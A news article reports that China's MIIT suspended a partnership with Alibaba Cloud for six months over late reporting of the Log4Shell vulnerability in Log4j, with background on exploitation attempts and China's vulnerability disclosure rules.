The Ministry of Industry and Information Technology (MIIT), China’s internet regulator, has discontinued a relationship with Alibaba Cloud for six months for not reporting a significant security flaw in the widely used Log4j logging framework on time. Alibaba Cloud Computing is a subsidiary of the e-commerce behemoth Alibaba Group.
Reuters and the South China Morning Post reported on the development, citing a report from the 21st Century Business Herald, a Chinese business daily newspaper. The critical security flaw, nicknamed Log4Shell or LogJam and tracked as CVE-2021-44228 (CVSS score: 10.0), lets malicious actors remotely execute code by acquiring a carefully constructed string logged by the software.
After the bug has been made public, threat actors have used Log4Shell extensively to gain control of vulnerable servers, because of the library’s near-universal use, which is used for logging security and performance information in various consumer and commercial services, websites, and apps — as well as operational technology solutions.
On November 24, Chen Zhaojun of Alibaba Cloud was credited with disclosing the problem. Further cybersecurity research into Log4j has revealed three additional issues in the Java-based application, forcing the Apache Software Foundation (ASF) to release a set of updates to prevent real-world attacks leveraging the flaws.
Check Point, an Israeli security firm, claims to have blocked more than 4.3 million exploitation attempts so far, with 46 percent of those incursions coming from known criminal organizations. “This vulnerability may cause the device to be remotely controlled, which will cause serious hazards such as theft of sensitive information and device service interruption,” the MIIT earlier stated in a public statement on December 17.
The decision also comes months after the Chinese government enacted new, more stringent vulnerability disclosure requirements, requiring software and networking firms affected by major weaknesses to report them immediately to government authorities.
In September, the government followed up by releasing “cyberspace security and vulnerability professional databases” for reporting security flaws in networks, mobile applications, industrial control systems, IoT devices, smart cars, and other internet items that threat actors may target.